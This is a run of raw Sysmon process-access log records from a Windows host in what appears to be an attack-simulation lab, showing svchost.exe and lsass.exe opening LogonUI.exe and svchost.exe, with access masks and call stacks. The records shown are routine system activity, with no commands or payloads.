12:24:42.693{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291993Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.693{BEA10069-D0C2-6086-0F00-00000000BB01}9365904C:\Windows\System32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\termsrv.dll+a1087|c:\windows\system32\termsrv.dll+6aa58|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291992Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.693{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291991Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.693{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291990Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.693{BEA10069-D0C1-6086-0B00-00000000BB01}6407044C:\Windows\system32\lsass.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291989Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.693{BEA10069-D0C1-6086-0B00-00000000BB01}6407044C:\Windows\system32\lsass.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291988Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.693{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291987Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.693{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291986Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.693{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291985Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.693{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291984Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.693{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291983Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.693{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-0F00-00000000BB01}936C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000291982Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.693{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291981Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.693{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291980Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.693{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291979Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.693{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-0F00-00000000BB01}936C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000291978Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.693{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291977Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.693{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291976Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.693{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291975Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.693{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291974Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.693{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291973Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.693{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291972Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.677{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-0F00-00000000BB01}936C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000291971Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.677{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\W